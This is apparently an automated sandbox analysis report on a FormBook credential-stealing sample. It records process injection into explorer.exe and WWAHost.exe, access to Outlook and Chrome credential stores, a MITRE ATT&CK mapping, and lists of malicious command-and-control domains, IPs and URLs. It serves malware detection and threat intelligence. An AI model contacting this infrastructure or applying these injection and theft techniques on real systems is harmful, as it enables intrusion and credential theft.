          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeDomain query: www.antalyabfe.com
          Source: C:\Windows\explorer.exeDomain query: www.rt66omm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Source: C:\Windows\explorer.exeDomain query: www.vns96.net
          Source: C:\Windows\explorer.exeNetwork Connect: 185.134.245.113 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.125.172 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.194.229.198 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jhg61.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.228.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.129.40.9 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.haynicorpon.biz
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\P5348574_74676.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: D90000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\P5348574_74676.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\P5348574_74676.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\P5348574_74676.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess created: C:\Users\user\Desktop\P5348574_74676.exe C:\Users\user\Desktop\P5348574_74676.exeJump to behavior
          Source: explorer.exe, 00000003.00000002.813415245.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.553877541.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000003.00000002.825234205.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.813415245.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.553877541.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.813415245.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.553877541.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.553662980.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.813096204.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000003.00000002.813415245.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.553877541.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\P5348574_74676.exeQueries volume information: C:\Users\user\Desktop\P5348574_74676.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\WWAHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\WWAHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception512
          Process Injection          		11
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		1
          Input Capture          		2
          Process Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items12
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 875301 Sample: P5348574_74676.exe Startdate: 25/05/2023 Architecture: WINDOWS Score: 100 32 Snort IDS alert for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus detection for URL or domain 2->36 38 6 other signatures 2->38 8 P5348574_74676.exe 3 2->8         started        process3 file4 22 C:\Users\user\...\P5348574_74676.exe.log, ASCII 8->22 dropped 11 P5348574_74676.exe 8->11         started        process5 signatures6 48 Modifies the context of a thread in another process (thread injection) 11->48 50 Maps a DLL or memory area into another process 11->50 52 Sample uses process hollowing technique 11->52 54 Queues an APC in another process (thread injection) 11->54 14 explorer.exe 3 1 11->14 injected process7 dnsIp8 26 www.berlinhealthweek.com 130.185.109.77, 49694, 80 XIRRADE Germany 14->26 28 www.jhg61.com 150.129.40.9, 49707, 49708, 49709 TELECOM-HKHongKongTelecomGlobalDataCentreHK Hong Kong 14->28 30 9 other IPs or domains 14->30 56 System process connects to network (likely due to code injection or exploit) 14->56 18 WWAHost.exe 13 14->18         started        signatures9 process10 dnsIp11 24 www.jhg61.com 18->24 40 Tries to steal Mail credentials (via file / registry access) 18->40 42 Tries to harvest and steal browser information (history, passwords, etc) 18->42 44 Deletes itself after installation 18->44 46 2 other signatures 18->46 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          P5348574_74676.exe58%ReversingLabsByteCode-MSIL.Trojan.AveMariaRAT
          P5348574_74676.exe100%AviraTR/AD.Swotter.gtsrn
          P5348574_74676.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
          http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
          http://www.jhg61.com/bpg5/www.jhg61.comUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.rt66omm.com/bpg5/www.rt66omm.comUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.haynicorpon.biz/bpg5/?lpw7=E1lEyZmRnD2D+FehgZ3adwfuD0V+JGYoymMHnSTWmThHM+xhQcv29ZH2HKfEtfNOP/hjUin7/rBu/LxtAOfOYIovOzsEyI2Bzg==&UZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.antalyabfe.com0%Avira URL Cloudsafe
          http://www.jhg61.com/0%Avira URL Cloudsafe
          http://www.thetowerbells.com/bpg5/www.thetowerbells.comUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.vns96.net/bpg5/www.vns96.netUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.jhg61.com/bpg5/100%Avira URL Cloudmalware
          http://www.techwithsun.com/bpg5/www.techwithsun.com100%Avira URL Cloudmalware
          http://www.thetowerbells.com/bpg5/100%Avira URL Cloudmalware
          http://www.haynicorpon.biz100%Avira URL Cloudmalware
          http://www.mysparexrewards.com100%Avira URL Cloudmalware
          http://www.techwithsun.com/bpg5/100%Avira URL Cloudmalware
          http://www.perkibeans.com/bpg5/0%Avira URL Cloudsafe
          http://www.techwithsun.com100%Avira URL Cloudmalware
          http://www.wearecatalyst.app/bpg5/100%Avira URL Cloudmalware
          http://www.vns96.net/bpg5/?lpw7=fXcMbGDjExj3drMKkufBQsBzHfQKFTmLB4JM93eT0riZ5SFz+kUtiUeQeK0rTvuj3gbHhqJGCt4vmHgIT135jm/4dwFi2a8Vxg==&UZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.jhg61.com/bpg5/?lpw7=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmy100%Avira URL Cloudmalware
          http://www.antalyabfe.com/bpg5/100%Avira URL Cloudmalware
          http://www.fabricadepack.fun/bpg5/www.fabricadepack.funUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://ctldl.windowsupctionSettings0%Avira URL Cloudsafe
          http://www.rt66omm.com0%Avira URL Cloudsafe
          http://www.perkibeans.com0%Avira URL Cloudsafe
          http://www.gomarketing.info100%Avira URL Cloudmalware
          http://www.perkibeans.com/bpg5/www.perkibeans.comUZCu=zJfEuRXw-P0%Avira URL Cloudsafe
          http://www.vns96.net0%Avira URL Cloudsafe
          http://www.fabricadepack.fun0%Avira URL Cloudsafe
          http://www.rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&UZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.haynicorpon.biz/bpg5/100%Avira URL Cloudmalware
          http://www.gomarketing.info/bpg5/www.gomarketing.infoUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.wearecatalyst.app0%Avira URL Cloudsafe
          http://www.vns96.net/bpg5/100%Avira URL Cloudmalware
          http://www.gomarketing.info/bpg5/100%Avira URL Cloudmalware
          http://www.thetowerbells.com0%Avira URL Cloudsafe
          http://www.gomarketing.info/bpg5/?lpw7=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==&UZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.mysparexrewards.com/bpg5/100%Avira URL Cloudmalware
          http://www.musicandgros.com100%Avira URL Cloudmalware
          http://www.bisarropainting.com/bpg5/www.bisarropainting.comUZCu=zJfEuRXw-P0%Avira URL Cloudsafe
          http://www.berlinhealthweek.com/bpg5/100%Avira URL Cloudmalware
          http://www.jhg61.com0%Avira URL Cloudsafe
          https://www.antalyabfe.com/bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3100%Avira URL Cloudmalware
          http://www.fabricadepack.fun/bpg5/100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.bisarropainting.comAD0%Avira URL Cloudsafe
          http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.musicandgros.com/bpg5/?lpw7=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&UZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.42230.orgI0%Avira URL Cloudsafe
          http://www.thetowerbells.com/bpg5/?lpw7=Xv/upeh51eH8JUjKDjNCkuTcNeiL8VtsCg7ztHvoG96mJwKh62aGaGa8UVClz5xrnRG3Z5NRq8txS1i3c96fEoalz7dwQDKkbQ==&UZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.rt66omm.com/bpg5/100%Avira URL Cloudmalware
          http://www.musicandgros.com/bpg5/www.musicandgros.comUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.perkibeans.com)B0%Avira URL Cloudsafe
          http://www.42230.org100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com100%Avira URL Cloudmalware
          http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.42230.org/bpg5/www.42230.orgUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.42230.org/bpg5/100%Avira URL Cloudmalware
          http://www.antalyabfe.com/bpg5/www.antalyabfe.comUZCu=zJfEuRXw-P100%Avira URL Cloudmalware
          http://www.thetowerbells.com/bpg5/www.thetowerbells.com100%Avira URL Cloudmalware
          http://rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf100%Avira URL Cloudmalware
          http://www.bisarropainting.com/bpg5/0%Avira URL Cloudsafe
          http://www.musicandgros.com/bpg5/100%Avira URL Cloudmalware
          http://www.bisarropainting.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.thetowerbells.com
          		185.134.245.113
          		truetrue
            		unknown
            www.berlinhealthweek.com
            		130.185.109.77
            		truetrue
              		unknown
              www.gomarketing.info
              		198.177.124.57
              		truetrue
                		unknown
                www.antalyabfe.com
                		188.114.96.7
                		truetrue
                  		unknown
                  www.vns96.net
                  		104.194.229.198
                  		truetrue
                    		unknown
                    www.rt66omm.com
                    		118.27.125.172
                    		truetrue
                      		unknown
                      www.jhg61.com
                      		150.129.40.9
                      		truetrue
                        		unknown
                        musicandgros.com
                        		81.169.145.93
                        		truetrue
                          		unknown
                          www.haynicorpon.biz
                          		183.90.228.46
                          		truetrue
                            		unknown
                            www.musicandgros.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.haynicorpon.biz/bpg5/?lpw7=E1lEyZmRnD2D+FehgZ3adwfuD0V+JGYoymMHnSTWmThHM+xhQcv29ZH2HKfEtfNOP/hjUin7/rBu/LxtAOfOYIovOzsEyI2Bzg==&UZCu=zJfEuRXw-Ptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.thetowerbells.com/bpg5/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.vns96.net/bpg5/?lpw7=fXcMbGDjExj3drMKkufBQsBzHfQKFTmLB4JM93eT0riZ5SFz+kUtiUeQeK0rTvuj3gbHhqJGCt4vmHgIT135jm/4dwFi2a8Vxg==&UZCu=zJfEuRXw-Ptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.antalyabfe.com/bpg5/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.gomarketing.info/bpg5/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&UZCu=zJfEuRXw-Ptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.haynicorpon.biz/bpg5/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.vns96.net/bpg5/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.gomarketing.info/bpg5/?lpw7=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==&UZCu=zJfEuRXw-Ptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-Ptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.musicandgros.com/bpg5/?lpw7=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&UZCu=zJfEuRXw-Ptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.thetowerbells.com/bpg5/?lpw7=Xv/upeh51eH8JUjKDjNCkuTcNeiL8VtsCg7ztHvoG96mJwKh62aGaGa8UVClz5xrnRG3Z5NRq8txS1i3c96fEoalz7dwQDKkbQ==&UZCu=zJfEuRXw-Ptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.rt66omm.com/bpg5/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.musicandgros.com/bpg5/true
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.techwithsun.com/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://duckduckgo.com/chrome_newtabWWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drfalse
                                		high
                                http://www.perkibeans.com/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=-15B7L5MNM.4.drfalse
                                  		high
                                  http://www.jhg61.com/bpg5/www.jhg61.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000003.00000002.833320353.00007FF883839000.00000002.00000001.01000000.0000000A.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jhg61.com/WWAHost.exe, 00000004.00000002.813585736.0000000003715000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.thetowerbells.com/bpg5/www.thetowerbells.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.wearecatalyst.app/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.techwithsun.com/bpg5/www.techwithsun.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://search.yahoo.com?fr=crmas_sfpfWWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drfalse
                                    		high
                                    http://www.rt66omm.com/bpg5/www.rt66omm.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.antalyabfe.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jhg61.com/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
